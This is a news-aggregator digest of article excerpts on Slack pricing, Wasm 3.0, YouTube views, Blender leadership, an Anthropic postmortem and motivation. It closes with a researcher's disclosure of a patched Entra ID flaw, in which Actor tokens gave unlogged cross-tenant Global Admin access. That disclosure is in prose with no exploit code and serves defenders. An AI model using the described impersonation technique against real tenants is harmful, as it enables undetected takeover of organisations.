10 interesting stories served every morning and every evening.
Slack is extorting us with a $195k/yr bill increase
An open letter, or something
For nearly 11 years, Hack Club - a nonprofit that provides coding education and community to teenagers worldwide - has used Slack as the tool for communication. We weren’t freeloaders. A few years ago, when Slack transitioned us from their free nonprofit plan to a $5,000/year arrangement, we happily paid. It was reasonable, and we valued the service they provided to our community.
However, two days ago, Slack reached out to us and said that if we don’t agree to pay an extra $50k this week and $200k a year, they’ll deactivate our Slack workspace and delete all of our message history.
One could argue that Slack is free to stop providing us the nonprofit offer at any time, but in my opinion, a six-month grace period is the bare minimum for a hike this massive, if not more. Essentially, Salesforce (a $230 billion company) is strong-arming a small nonprofit for teens by giving us less than a week to pony up a pretty massive sum of money or risk having all of our communications cut off. That’s absurd.
The small amount of notice has also been catastrophic for the programs that we run. Dozens of our staff and volunteers are now scrambling to update systems, rebuild integrations and migrate years of institutional knowledge. The opportunity cost of this forced migration is simply staggering.
Anyway, we’re moving to Mattermost. This experience has taught us that owning your data is incredibly important, and, especially if you’re a small business, I’d advise you to move away too.
This post was rushed out because, well, this has been a shock! If you’d like any additional details then feel free to send me an email.
...
Read the original on skyfall.dev »
Three years ago, version 2.0 of the Wasm standard was (essentially) finished, which brought a number of new features, such as vector instructions, bulk memory operations, multiple return values, and simple reference types.
In the meantime, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to announce the release of Wasm 3.0 as the new “live” standard.
This is a substantially larger update: several big features, some of which have been in the making for six or eight years, finally made it over the finishing line.
64-bit address space. Memories and tables can now be declared to use i64 as their address type instead of just i32. That expands the available address space of Wasm applications from 4 gigabytes to (theoretically) 16 exabytes, to the extent that physical hardware allows. While the web will necessarily keep enforcing certain limits — on the web, a 64-bit memory is limited to 16 gigabytes — the new flexibility is especially interesting for non-web ecosystems using Wasm, as they can support much, much larger applications and data sets now.
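A quick check of that arithmetic (Wasm addresses are byte offsets, and memory sizes are counted in 64 KiB pages); a few lines of Python:

GiB, EiB, PAGE = 2**30, 2**60, 2**16   # 64 KiB Wasm page size

print(2**32 // GiB)      # 4: GiB addressable with an i32 address type
print(2**64 // EiB)      # 16: EiB addressable with an i64 address type
print(16 * GiB // PAGE)  # 262144: 64 KiB pages in the 16 GiB web limit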
Multiple memories. Contrary to popular belief, Wasm applications were always able to use multiple memory objects — and hence multiple address spaces — simultaneously. However, previously that was only possible by declaring and accessing each of them in separate modules. This gap has been closed: a single module can now declare (define or import) multiple memories and directly access them, including directly copying data between them. This finally allows tools like wasm-merge, which perform “static linking” on two or more Wasm modules by merging them into one, to work for all Wasm modules. It also paves the way for new uses of separate address spaces, e.g., for security (separating private data), for buffering, or for instrumentation.
Garbage collection. In addition to expanding the capabilities of raw linear memories, Wasm also adds support for a new (and separate) form of storage that is automatically managed by the Wasm runtime via a garbage collector. Staying true to the spirit of Wasm as a low-level language, Wasm GC is low-level as well: a compiler targeting Wasm can declare the memory layout of its runtime data structures in terms of struct and array types, plus unboxed tagged integers, whose allocation and lifetime is then handled by Wasm. But that’s it. Everything else, such as engineering suitable representations for source-language values, including implementation details like method tables, remains the responsibility of compilers targeting Wasm. There are no built-in object systems, nor closures or other higher-level constructs — which would inevitably be heavily biased towards specific languages. Instead, Wasm only provides the basic building blocks for representing such constructs and focuses purely on the memory management aspect.
Typed references. The GC extension is built upon a substantial extension to the Wasm type system, which now supports much richer forms of references. Reference types can now describe the exact shape of the referenced heap value, avoiding additional runtime checks that would otherwise be needed to ensure safety. This more expressive typing mechanism, including subtyping and type recursion, is also available for function references, making it possible to perform safe indirect function calls without any runtime type or bounds check, through the new call_ref instruction.
Tail calls. Tail calls are a variant of function calls that immediately exit the current function, and thereby avoid taking up additional stack space. Tail calls are an important mechanism that is used in various language implementations both in user-visible ways (e.g., in functional languages) and for internal techniques (e.g., to implement stubs). Wasm tail calls are fully general and work for callees both selected statically (by function index) and dynamically (by reference or table).
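CPython makes a handy illustration of life without this feature: the recursive call below is in tail position, yet each call still consumes a stack frame, which is exactly the overhead Wasm’s new instructions such as return_call eliminate. A Python sketch of the idea, not Wasm:

def countdown(n):
    if n == 0:
        return "done"
    return countdown(n - 1)   # tail position, but CPython keeps every frame

def countdown_tco(n):
    while n:                  # what a tail-calling engine effectively runs:
        n -= 1                # the call becomes a jump that reuses one frame
    return "done"

print(countdown_tco(10**6))   # constant stack space
try:
    countdown(10**6)          # exhausts the stack instead
except RecursionError:
    print("RecursionError: no tail-call elimination")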
Exception handling. Exceptions provide a way to locally abort execution, and are a common feature in modern programming languages. Previously, there was no efficient way to compile exception handling to Wasm, and existing compilers typically resorted to convoluted ways of implementing them by escaping to the host language, e.g., JavaScript. This was neither portable nor efficient. Wasm 3.0 hence provides native exception handling within Wasm. Exceptions are defined by declaring exception tags with associated payload data. As one would expect, an exception can be thrown, and selectively be caught by a surrounding handler, based on its tag. Exception handlers are a new form of block instruction that includes a dispatch list of tag/label pairs or catch-all labels to define where to jump when an exception occurs.
Relaxed vector instructions. Wasm 2.0 added a large set of vector (SIMD) instructions, but due to differences in hardware, some of these instructions have to do extra work on some platforms to achieve the specified semantics. In order to squeeze out maximum performance, Wasm 3.0 introduces “relaxed” variants of these instructions that are allowed to have implementation-dependent behavior in certain edge cases. This behavior must be selected from a pre-specified set of legal choices.
Deterministic profile. To make up for the added semantic fuzziness of relaxed vector instructions, and to support settings that demand deterministic execution semantics (such as blockchains or replayable systems), the Wasm standard now specifies a deterministic default behavior for every instruction with otherwise non-deterministic results — currently, this includes floating-point operators and their generated NaN values and the aforementioned relaxed vector instructions. Across platforms that choose to implement this deterministic execution profile, Wasm is fully deterministic, reproducible, and portable.
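To see why a profile is needed, recall that IEEE 754 permits many bit patterns that all count as NaN, and a non-deterministic instruction may return any of them; the deterministic profile pins the choice to one canonical pattern. A small Python illustration of the payload bits:

import math
import struct

def f32_bits(x):
    return hex(struct.unpack("<I", struct.pack("<f", x))[0])

canonical = struct.unpack("<f", struct.pack("<I", 0x7fc00000))[0]
payload1  = struct.unpack("<f", struct.pack("<I", 0x7fc00001))[0]

print(math.isnan(canonical), math.isnan(payload1))  # True True: both are NaNs
print(f32_bits(canonical), f32_bits(payload1))      # 0x7fc00000 0x7fc00001
# A non-deterministic operator may legally produce either pattern; pinning
# the result makes runs bit-for-bit reproducible.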
Custom annotation syntax. Finally, the Wasm text format has been enriched with generic syntax for placing annotations in Wasm source code. Analogous to custom sections in the binary format, these annotations are not assigned any meaning by the Wasm standard itself, and can be chosen to be ignored by implementations. However, they provide a way to represent the information stored in custom sections in human-readable and writable form, and concrete annotations can be specified by downstream standards.
In addition to these core features, embeddings of Wasm into JavaScript benefit from a new extension to the JS API:
JS string builtins. JavaScript string values can already be passed to Wasm as externrefs. Functions from this new primitive library can be imported into a Wasm module to directly access and manipulate such external string values inside Wasm.
With these new features, Wasm has much better support for compiling high-level programming languages. Enabled by this, we have seen various new language implementations popping up that target Wasm, for languages such as Java, OCaml, Scala, Kotlin, Scheme, and Dart, all of which use the new GC feature.
On top of all these goodies, Wasm 3.0 is also the first version of the standard produced with the new SpecTec tool chain. We believe that this makes for an even more reliable specification.
Wasm 3.0 is already shipping in most major web browsers, and support in stand-alone engines like Wasmtime is on track to completion as well. The Wasm feature status page tracks support across engines.
...
Read the original on webassembly.org »
...
Read the original on www.meta.com »
...
Read the original on www.meta.com »
Over the past month or so, many YouTubers have been reporting major drops in their video view counts. Theories have run wild, but one explanation, involving ad blockers, makes the most sense, though YouTube isn’t confirming anything directly.
Since mid-August, many YouTubers have noticed their view counts are considerably lower than they were before, in some cases with very drastic drops. The reason for the drop, though, has been shrouded in mystery for many creators.
The most likely explanation seems to be that YouTube is not counting views properly for users with an ad blocker enabled, another step in the platform’s continued war on ad blockers. This was first spotted by Josh Strife Hayes, who noticed that view counts on TVs, phones, and tablets have held steady, while views on computers have dropped by around 50% since the trend started in mid-August. TechLinked, a channel in the Linus Tech Tips family, confirmed similar numbers in its own statistics.
This aligns with one of the possible explanations that YouTube itself hinted at in an acknowledgement of lower view counts.
Viewers Using Ad Blockers & Other Content Blocking Tools: Ad blockers and other extensions can impact the accuracy of reported view counts. Channels whose audiences include a higher proportion of users utilizing such tools may see more fluctuations in traffic related to updates to these tools.
The rest of the post addresses prior speculation that YouTube’s new AI-powered age verification tools were to blame — which YouTube adamantly says is not the case — while also offering other possible explanations such as “seasonal viewing habits” and competition on the platform.
YouTube says “there is no systemic issue that is impacting creators” regarding lower view counts.
This ad blocker situation does seem the most likely explanation, though. In a prior video, Linus Tech Tips had noted that while view counts were down, ad revenue was not. If computer views are the only ones down, it stands to reason that viewers using an ad blocker are not being counted correctly, especially if ad revenue isn’t taking a hit from the lower view counts. YouTube’s hint that ad blockers “can impact the accuracy of reported view counts” certainly suggests this is possible, even if it’s not firm confirmation.
...
Read the original on 9to5google.com »
...
Read the original on unscreenshottable.vercel.app »
The keynote from this week’s Blender Conference, during which Ton Roosendaal — the original creator of the open-source 3D software — announced that he is standing down as Blender CEO.
Ton Roosendaal is to step down as chairman of the Blender Foundation and Blender CEO on 1 January 2026. The news was announced during today’s keynote at the Blender Conference.
Roosendaal — the original author of the open-source 3D software, and its public figurehead for the past three decades — will pass on his roles to current Blender COO Francesco Siddi.
Roosendaal himself will move to the newly established Blender Foundation supervisory board.
Other new Blender Foundation board positions include Head of Development Sergey Sharybin, Head of Product Dalai Felinto, and Head of Operations Fiona Cohen.
Ton Roosendaal in the early 1990s. Blender originated as in-house software at NeoGeo, the animation studio he co-founded.
Blender’s original creator and principal promoter
Blender began life in the mid-1990s as in-house software at NeoGeo, the Dutch animation studio that Roosendaal co-founded, and for which he wrote the custom tools.
Although Blender was initially set to become a commercial product, when investors decided to pull the plug on Not a Number, the firm he had founded to develop it, Roosendaal took the software open-source.
A crowdfunding campaign quickly raised the €110,000 needed to buy back the code base, and on 13 October 2002, Blender was released to the world under a GPL licence.
From the start, two things distinguished Blender from most other open-source CG applications.
First, even before the first release, Roosendaal established the non-profit Blender Foundation, so development was run through an organization akin to a commercial software developer.
Second, the software was tested in something close to real-world production conditions, on a series of ‘open movies’, beginning with 2006’s Elephants Dream, and continuing to this day.
The early open movies — funded through a combination of DVD pre-sales and arts grants — also provided valuable exposure for Blender, and illustrated Roosendaal’s gifts as a producer and promoter: a mixture of passion, physical presence, and sheer force of personality.
Taking Blender from fan favorite to staple of professional production
By the mid-2010s, Blender was quietly being adopted in major studios, with Pixar confirming that it was one of a small number of third-party 3D tools that it approved for use internally.
A major turning point was the release of Blender 2.80: the 2019 update that addressed many of the UI and workflow issues that had previously alienated artists used to commercial 3D apps.
It catalysed support for Blender among big tech firms, with a landmark $1.2 million grant from Epic Games followed by backing from companies including AMD, Intel, NVIDIA and Qualcomm.
Last year, the Corporate Patrons of the Blender Development Fund accounted for just under 40% of the collective income of the Blender organizations.
The resulting €3.1 million paid the salaries of over 15 full-time developers, plus a similar number of tech support staff and part-time devs: a larger team than many commercial CG tools have.
Roosendaal (right) introduces the new Blender leadership team: (L-R) incoming CEO Francesco Siddi, Sergey Sharybin, Dalai Felinto and Fiona Cohen.
The public ‘incarnation of Blender’
During that time, the software has been closely identified with Roosendaal himself, both through his role as chairman of the Blender Foundation, and as a kind of totemic figurehead.
When I interviewed him in 2019 for an article in a UK tech magazine, he described himself, quite accurately, as “the incarnation of Blender”.
But in the same interview, he noted that “Blender is much bigger than me” and commented: “Now I need to get the organisation working without me, and then I can move on.”
Six years later, those plans have finally come to fruition, with the appointment of a new Blender leadership team.
From single figurehead to four core leadership roles
Announcing his departure at the Blender Conference, Roosendaal identified four of his key skills that he felt had led to Blender’s success: as an organizer, developer, designer and entrepreneur.
It’s telling that rather than trying to appoint one person to fulfil all four roles, they have been split out to four separate people.
Former animation producer Fiona Cohen takes on the organizational role, as the Blender Foundation’s new Head of Operations.
The developer role will be taken by Blender Lead Engineer Sergey Sharybin in his new role as the Foundation’s Head of Development.
The designer role passes to another long-time Blender artist and developer, Dalai Felinto, as the new Head of Product.
The critical entrepreneurial role will be fulfilled by current Blender COO Francesco Siddi, who takes on Roosendaal’s job titles of chairman and CEO.
Siddi first began working with the Blender organization in 2012, as a VFX artist on the open movie Tears of Steel, later acting as a web developer and pipeline developer.
He began working as a producer on subsequent open movies in 2017, and has managed Blender’s industry relations since 2020.
“I am very proud to have such a wonderfully talented young team around me to bring our free and open source project into the next decade,” commented Roosendaal.
Read the official announcement that Ton Roosendaal is stepping down as Blender CEO
Read more about Blender’s leadership structure in the latest Blender Foundation annual report
...
Read the original on www.cgchannel.com »
Between August and early September, three infrastructure bugs intermittently degraded Claude’s response quality. We’ve now resolved these issues and want to explain what happened.
In early August, a number of users began reporting degraded responses from Claude. These initial reports were difficult to distinguish from normal variation in user feedback. By late August, the increasing frequency and persistence of these reports prompted us to open an investigation that led us to uncover three separate infrastructure bugs.
To state it plainly: We never reduce model quality due to demand, time of day, or server load. The problems our users reported were due to infrastructure bugs alone.
We recognize users expect consistent quality from Claude, and we maintain an extremely high bar for ensuring infrastructure changes don’t affect model outputs. In these recent incidents, we didn’t meet that bar. The following postmortem explains what went wrong, why detection and resolution took longer than we would have wanted, and what we’re changing to prevent similar future incidents.
We don’t typically share this level of technical detail about our infrastructure, but the scope and complexity of these issues justified a more comprehensive explanation.
We serve Claude to millions of users via our first-party API, Amazon Bedrock, and Google Cloud’s Vertex AI. We deploy Claude across multiple hardware platforms, namely AWS Trainium, NVIDIA GPUs, and Google TPUs. This approach provides the capacity and geographic distribution necessary to serve users worldwide.
Each hardware platform has different characteristics and requires specific optimizations. Despite these variations, we have strict equivalence standards for model implementations. Our aim is that users should get the same quality responses regardless of which platform serves their request. This complexity means that any infrastructure change requires careful validation across all platforms and configurations.
The overlapping nature of these bugs made diagnosis particularly challenging. The first bug was introduced on August 5, affecting approximately 0.8% of requests made to Sonnet 4. Two more bugs arose from deployments on August 25 and 26.
Although initial impacts were limited, a load balancing change on August 29 started to increase affected traffic. This caused many more users to experience issues while others continued to see normal performance, creating confusing and contradictory reports.
Below we describe the three bugs that caused the degradation, when they occurred, and how we resolved them:
On August 5, some Sonnet 4 requests were misrouted to servers configured for the upcoming 1M token context window. This bug initially affected 0.8% of requests. On August 29, a routine load balancing change unintentionally increased the number of short-context requests routed to the 1M context servers. At the worst impacted hour on August 31, 16% of Sonnet 4 requests were affected.
Approximately 30% of Claude Code users who made requests during this period had at least one message routed to the wrong server type, resulting in degraded responses. On Amazon Bedrock, misrouted traffic peaked at 0.18% of all Sonnet 4 requests from August 12. Incorrect routing affected less than 0.0004% of requests on Google Cloud’s Vertex AI between August 27 and September 16.
However, some users were affected more severely, as our routing is “sticky”. This meant that once a request was served by the incorrect server, subsequent follow-ups were likely to be served by the same incorrect server.
Resolution: We fixed the routing logic to ensure short- and long-context requests were directed to the correct server pools. We deployed the fix on September 4. A rollout to our first-party platforms and Google Cloud’s Vertex was completed by September 16. The fix is in the process of being rolled out on Bedrock.
On August 25, we deployed a misconfiguration to the Claude API TPU servers that caused an error during token generation. An issue caused by a runtime performance optimization occasionally assigned a high probability to tokens that should rarely be produced given the context, for example producing Thai or Chinese characters in response to English prompts, or producing obvious syntax errors in code. A small subset of users that asked a question in English might have seen “สวัสดี” in the middle of the response, for example.
This corruption affected requests made to Opus 4.1 and Opus 4 on August 25-28, and requests to Sonnet 4 August 25–September 2. Third-party platforms were not affected by this issue.
Resolution: We identified the issue and rolled back the change on September 2. We’ve added detection tests for unexpected character outputs to our deployment process.
On August 25, we deployed code to improve how Claude selects tokens during text generation. This change inadvertently triggered a latent bug in the XLA:TPU[1] compiler, which has been confirmed to affect requests to Claude Haiku 3.5.
We also believe this could have impacted a subset of Sonnet 4 and Opus 3 on the Claude API. Third-party platforms were not affected by this issue.
Resolution: We first observed the bug affecting Haiku 3.5 and rolled it back on September 4. We later noticed user reports of problems with Opus 3 that were compatible with this bug, and rolled it back on September 12. After extensive investigation we were unable to reproduce this bug on Sonnet 4 but decided to also roll it back out of an abundance of caution.
Simultaneously, we have (a) been working with the XLA:TPU team on a fix for the compiler bug and (b) rolled out a fix to use exact top-k with enhanced precision. For details, see the deep dive below.
To illustrate the complexity of these issues, here’s how the XLA compiler bug manifested and why it proved particularly challenging to diagnose.
When Claude generates text, it calculates probabilities for each possible next word, then randomly chooses a sample from this probability distribution. We use “top-p sampling” to avoid nonsensical outputs—only considering words whose cumulative probability reaches a threshold (typically 0.99 or 0.999). On TPUs, our models run across multiple chips, with probability calculations happening in different locations. To sort these probabilities, we need to coordinate data between chips, which is complex.[2]
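To make that concrete, here is a minimal top-p sampler in NumPy; a generic sketch of the standard technique described here, not Anthropic’s implementation:

import numpy as np

def sample_top_p(probs, p=0.99, rng=None):
    # Sample from the smallest set of tokens whose cumulative
    # probability reaches the threshold p (the "nucleus").
    rng = rng or np.random.default_rng()
    order = np.argsort(probs)[::-1]               # most probable first
    cumulative = np.cumsum(probs[order])
    cutoff = np.searchsorted(cumulative, p) + 1   # keep just enough tokens
    kept = order[:cutoff]
    kept_probs = probs[kept] / probs[kept].sum()  # renormalize the nucleus
    return int(rng.choice(kept, p=kept_probs))

vocab_probs = np.array([0.6, 0.25, 0.1, 0.04, 0.01])
print(sample_top_p(vocab_probs))  # the 0.01 tail token is (almost) never considered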
In December 2024, we discovered our TPU implementation would occasionally drop the most probable token when temperature was zero. We deployed a workaround to fix this case.
The root cause involved mixed precision arithmetic. Our models compute next-token probabilities in bf16 (16-bit floating point). However, the vector processor is fp32-native, so the TPU compiler (XLA) can optimize runtime by converting some operations to fp32 (32-bit). This optimization pass is guarded by the xla_allow_excess_precision flag which defaults to true.
This caused a mismatch: operations that should have agreed on the highest probability token were running at different precision levels. The precision mismatch meant they didn’t agree on which token had the highest probability. This caused the highest probability token to sometimes disappear from consideration entirely.
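The failure mode is easy to reproduce in miniature. Assuming the third-party ml_dtypes package for a NumPy-compatible bfloat16, two probabilities that are distinct in fp32 can collapse to the same bf16 value, so code running at different precisions can disagree on the top token:

import numpy as np
from ml_dtypes import bfloat16   # pip install ml-dtypes

probs = np.array([0.3999, 0.4000], dtype=np.float32)
print(np.argmax(probs))          # 1: in fp32, token 1 is the true maximum

rounded = probs.astype(bfloat16).astype(np.float32)  # what a bf16 path sees
print(rounded[0] == rounded[1])  # True: bf16 cannot tell the two apart
print(np.argmax(rounded))        # 0: the tie breaks to the wrong token

# Two operations computing "the highest probability token" at different
# precisions can thus disagree, and the true top token can drop out.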
On August 26, we deployed a rewrite of our sampling code to fix the precision issues and improve how we handled probabilities at the limit that reach the top-p threshold. But in fixing these problems, we exposed a trickier one.
Our fix removed the December workaround because we believed we’d solved the root cause. This led to a deeper bug in the approximate top-k operation—a performance optimization that quickly finds the highest probability tokens.[3] This approximation sometimes returned completely wrong results, but only for certain batch sizes and model configurations. The December workaround had been inadvertently masking this problem.
The bug’s behavior was frustratingly inconsistent. It changed depending on unrelated factors such as what operations ran before or after it, and whether debugging tools were enabled. The same prompt might work perfectly on one request and fail on the next.
While investigating, we also discovered that the exact top-k operation no longer had the prohibitive performance penalty it once did. We switched from approximate to exact top-k and standardized some additional operations on fp32 precision.[4] Model quality is non-negotiable, so we accepted the minor efficiency impact.
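For reference, exact top-k is a simple, well-defined operation; a generic NumPy sketch (not the TPU implementation) of what “exact” means here:

import numpy as np

def exact_top_k(values, k):
    # argpartition moves the k largest entries to the end in O(n),
    # then only those k entries are sorted.
    idx = np.argpartition(values, -k)[-k:]
    idx = idx[np.argsort(values[idx])[::-1]]
    return idx, values[idx]

logits = np.array([1.5, -0.2, 3.1, 0.7, 2.8])
print(exact_top_k(logits, 3))   # indices [2 4 0], values [3.1 2.8 1.5]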
Our validation process ordinarily relies on benchmarks alongside safety evaluations and performance metrics. Engineering teams perform spot checks and deploy to small “canary” groups first.
These issues exposed critical gaps that we should have identified earlier. The evaluations we ran simply didn’t capture the degradation users were reporting, in part because Claude often recovers well from isolated mistakes. Our own privacy practices also created challenges in investigating reports. Our internal privacy and security controls limit how and when engineers can access user interactions with Claude, in particular when those interactions are not reported to us as feedback. This protects user privacy but prevents engineers from examining the problematic interactions needed to identify or reproduce bugs.
Each bug produced different symptoms on different platforms at different rates. This created a confusing mix of reports that didn’t point to any single cause. It looked like random, inconsistent degradation.
More fundamentally, we relied too heavily on noisy evaluations. Although we were aware of an increase in reports online, we lacked a clear way to connect these to each of our recent changes. When negative reports spiked on August 29, we didn’t immediately make the connection to an otherwise standard load balancing change.
As we continue to improve our infrastructure, we’re also improving the way we evaluate and prevent bugs like those discussed above across all platforms where we serve Claude. Here’s what we’re changing:
* More sensitive evaluations: To help discover the root cause of any given issue, we’ve developed evaluations that can more reliably differentiate between working and broken implementations. We’ll keep improving these evaluations to keep a closer eye on model quality.
* Quality evaluations in more places: Although we run regular evaluations on our systems, we will run them continuously on true production systems to catch issues such as the context window load balancing error.
* Faster debugging tooling: We’ll develop infrastructure and tooling to better debug community-sourced feedback without sacrificing user privacy. Additionally, some bespoke tools developed here will be used to reduce the remediation time in future similar incidents, if those should occur.
Evals and monitoring are important. But these incidents have shown that we also need continuous signal from users when responses from Claude aren’t up to the usual standard. Reports of specific changes observed, examples of unexpected behavior encountered, and patterns across different use cases all helped us isolate the issues.
It remains particularly helpful for users to continue to send us their feedback directly. You can use the /bug command in Claude Code or you can use the “thumbs down” button in the Claude apps to do so. Developers and researchers often create new and interesting ways to evaluate model quality that complement our internal testing. If you’d like to share yours, reach out to feedback@anthropic.com.
We remain grateful to our community for these contributions.
...
Read the original on www.anthropic.com »
We have an air bike in our basement. If you are unfamiliar with air bikes, they are similar to stationary bikes with foot pedals but also have handles you push and pull with your arms. It uses air resistance, so the harder you pedal and move your arms, the higher the resistance.
It’s also known as an assault bike. 😬
Which is apt, because it’s a butt-kicker of a workout. I use it about once a week, more frequently in the winter when it’s too cold to run, and less often in the summer when I can get outside more. And I kind of hate it!
Before I even drag myself to our basement, I’m already dreading it. The only way I can convince myself to do it is by finding a suitably engaging show I can distract myself with on my phone while I huff and puff.
Every time, I start my warm-up and think to myself,
“It’s only 30 minutes, I can do this!”
Like clockwork, within the first three minutes, I think, “Maybe I will only do ten minutes today and do some pilates or weights instead.”
After ten minutes, I think, “OK, surely I can make it to 20 minutes, and that will be enough”.
After 20 minutes, as I gasp for air and sweat soaks through my shirt, I think “Well, I already made it to 20 minutes… I guess I will just finish it.”
And then I proceed to huff and puff to the end, wherein I walk my wobbly legs back up the stairs to do a cooldown. At which point I think, “That suuuuuucked…” And then congratulate myself on finishing as I try to get my heart rate back to normal. 🥵
This mental dance happens, without fail, every single time I ride.
I share this anecdote because it illustrates how tricky motivation can be, especially when faced with something you don’t want to do or have been procrastinating on. There are any number of things you have to deal with in your life that you don’t want to. There are even things you might generally enjoy that feel like they are hanging over you.
The pattern often goes like this:
* Before you start, it feels daunting, and the prospect lingers in the back of your mind. You know it needs to be done, but you really, really don’t feel like it. You leave it until it starts to loom larger and larger.
* When you finally convince yourself to start, it’s not what you want to be doing, but it’s generally fine. It’s often not even as bad as you thought it would be, and it feels good to make progress.
* As you near the end, you can even push yourself a little to wrap it up and get it off your plate.
* When it’s over, you feel relieved, like a weight has been taken off your shoulders, and you are both pleased with yourself and a little annoyed that it took you so long to deal with.
Motivation is a topic that comes up with nearly all my clients, as they navigate the various complexities of their lives. In some ways, motivation seems simple. You ask yourself, “Why can’t I just make myself be motivated to do the thing?”, whatever the thing might be. However, as you beat yourself up about it, consider that many factors influence our decision-making and the feeling of being motivated.
Humans are complex creatures, with numerous brain chemicals and hormones influencing our overall physical and emotional state, which themselves are constantly impacted, sometimes drastically, by things like:
* Have you been sleeping well and enough?
* Have you been eating well and the right amount for you?
* Have you been imbibing alcohol or other things?
* Have you been moving your body regularly?
* Do you have any physical or mental conditions?
* Are you in pain?
* Do you have significant life stressors at this time?
* What time of day is it?
* Where are you in your natural hormone cycles?
* How old are you?
* Have you had any conflicts in your life recently?
* Did you move your body in a way entirely within your usual routines, but apparently in a way that is no longer acceptable?
* Did you sleep in a slightly different position than usual, and now your back will never be the same again?
I could go on, but you get the idea.😅
All of these factors (and more) conspire to shift your mood, physical energy, and mental energy, often making it harder to muster the motivation to do things. What, then, can you do to move things in the right direction? How do you motivate yourself to do a thing you don’t want to do?
Here are several ways to help encourage action when you feel unmotivated.
There are many external and internal factors, as listed above, that contribute to motivation.
* When your body isn’t feeling good, it’s harder to make it do things.
* When your mind is tired, distracted, or overwhelmed, it’s challenging to focus and accomplish tasks.
* When the thing you need to do isn’t important to you or something you don’t like, it’s hard to make yourself do it.
When you know why you aren’t motivated, you can think about what you could change to make things easier on yourself. What factors do you have control over?
* Environment - Is there a place you can go or a thing you can add that will make it feel easier? For example, I have my writing desk set up in a quiet corner of my bedroom (not the office I share with my husband) to help make writing easier, even when I am not feeling it.
* Mood - Is there something that will help boost your mood? Go for a ten-minute walk, treat yourself to a donut, text your best friend for a pep talk, turn on your favourite tunes… anything that will give you a little pick-me-up.
* Body - Are there things you can do to take care of your body to make it feel better? Try some stretching, take a nap, meditate, read a book, get some fresh air, go for a run, eat a comfort meal, or do anything that will help your body feel less stressed.
* Negative or fear motivators - Is the thing you are not motivated to do being motivated by negative or fear motivators? These include things like fear of judgment, fear of conflict, shame, guilt, or obligation. These motivators only go so far and deserve further examination to determine their place in your priorities. Maybe they aren’t things you need to do in the first place.
The key point here is to identify where you have control and where you don’t, and then do your best to adapt your circumstances to make it easier to take action.
When you think about the various activities and tasks you do each day, what is it that encourages you to do them? Some of those things will be negative motivators, as I mentioned above, but others will be things you do for fun, because they are interesting or rewarding. These are some tactics to consider for things that might help motivate you:
You know what makes cleaning out the garage a lot better? Some good tunes. Throw on an audiobook while you cook dinner. Watch a good show while you huff and puff on the air bike! Think about the things you enjoy and consider how you can combine them with the thing you’re trying to motivate yourself to do.
Sometimes it can be challenging to push yourself to do something when there are no external motivators. Ask a friend to be your accountability buddy, or hire a professional to help you stay accountable for the thing you’re trying to do, such as a coach, trainer, teacher, or dietitian. I know that one of the significant value-added benefits my clients get from working with me for a few months is having someone they have to report back to on their progress!
Is there any way to turn the process or thing you are unmotivated to do into a game? Can you add rewards if you do a certain amount, or set a goal for how many days you make progress in a row? For example, one of my motivators for doing some kind of fitness every day is keeping up my streak! 2817 days in a row as of publishing. 😁
Beyond small planned rewards, having something to look forward to as you make progress on your task or activity can also help encourage you to continue moving forward. Maybe you take a day off, order your favourite takeout, or simply share it with someone you care about.
For more specifics on types of motivation, read my article, What Motivates You? Learn the Types of Motivation and How to Use Them, where I get into more detail about intrinsic and extrinsic motivation.
If part of why you feel unmotivated is that what you need to do feels big and overwhelming, often the best thing you can do is try to break it down into smaller, more manageable pieces. What is the smallest amount you can do to make a bit of progress?
* Commit to spending 5 minutes on it
* Choose a small corner of a room you need to clean
* Write the text, even if you don’t send it
* Plan in your calendar when you will do it, so you don’t have it sitting in the back of your mind
* Talk about it with your partner or a friend
* Switch tasks to take a break and come back to it
Often, getting over the hump of starting something is enough to help push you through it. Even if it isn’t, at the very least, you have made some amount of progress, which you can build on.
If the thing you need to do is something you need to do regularly, like writing, fitness, practicing an instrument, or cleaning, you can’t rely purely on motivation to drive you. Even for things you enjoy, it’s easy to push something off “until you feel like it”. But with so many factors affecting your mood and energy, the times when you feel like it will be fleeting. Instead of relying on motivation, try to establish a routine that fosters consistency.
* Plan your intentional week so you have an idea of when you intend to do it
* Book it in your calendar
* Set a certain amount of time you will put aside each day or week to chip away at it
A little bit, consistently, will go a long way.
Sometimes, when you are not feeling motivated to do something, it’s reasonable to just put it on the back burner. Maybe it’s just not a priority right now, and that’s totally fine! Ask yourself, is this a glass ball or a plastic ball? If it’s plastic, set it aside for a bit and focus your time and energy on other things.
It’s ok to decide now is not the right time, but make it an intentional decision instead of something you avoid and feel bad about!
If you’re struggling with motivation, you’re not alone! It’s normal, it’s natural, and there are tons of different, ever-changing factors that will change how you feel. Do your best to examine where you are at, control what you can control, and make progress where you can!
Need some help getting motivated? Get in touch!
...
Read the original on ashleyjanssen.com »
One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens
While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. This vulnerability could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments). If you are an Entra ID admin reading this, yes that means complete access to your tenant. The vulnerability consisted of two components: undocumented impersonation tokens, called “Actor tokens”, that Microsoft uses in their backend for service-to-service (S2S) communication. Additionally, there was a critical flaw in the (legacy) Azure AD Graph API that failed to properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.
Effectively this means that with a token I requested in my lab tenant I could authenticate as any user, including Global Admins, in any other tenant. Because of the nature of these Actor tokens, they are not subject to security policies like Conditional Access, which means there was no setting that could have mitigated this for specific hardened tenants. Since the Azure AD Graph API is an older API for managing the core Azure AD / Entra ID service, access to this API could have been used to make any modification in the tenant that Global Admins can do, including taking over or creating new identities and granting them any permission in the tenant. With these compromised identities the access could also be extended to Microsoft 365 and Azure.
I reported this vulnerability the same day to the Microsoft Security Response Center (MSRC). Microsoft fixed this vulnerability on their side within days of the report being submitted and has rolled out further mitigations that block applications from requesting these Actor tokens for the Azure AD Graph API. Microsoft also issued CVE-2025-55241 for this vulnerability.
These tokens allowed full access to the Azure AD Graph API in any tenant. Requesting Actor tokens does not generate logs, and even if it did, those logs would be generated in my tenant instead of in the victim tenant, meaning there is no record that these tokens ever existed.
Furthermore, the Azure AD Graph API does not have API level logging. Its successor, the Microsoft Graph, does have this logging, but for the Azure AD Graph this telemetry source is still in a very limited preview and I’m not aware of any tenant that currently has this available. Since there is no API level logging, it means the following Entra ID data could be accessed without any traces:
User information including all their personal details stored in Entra ID.
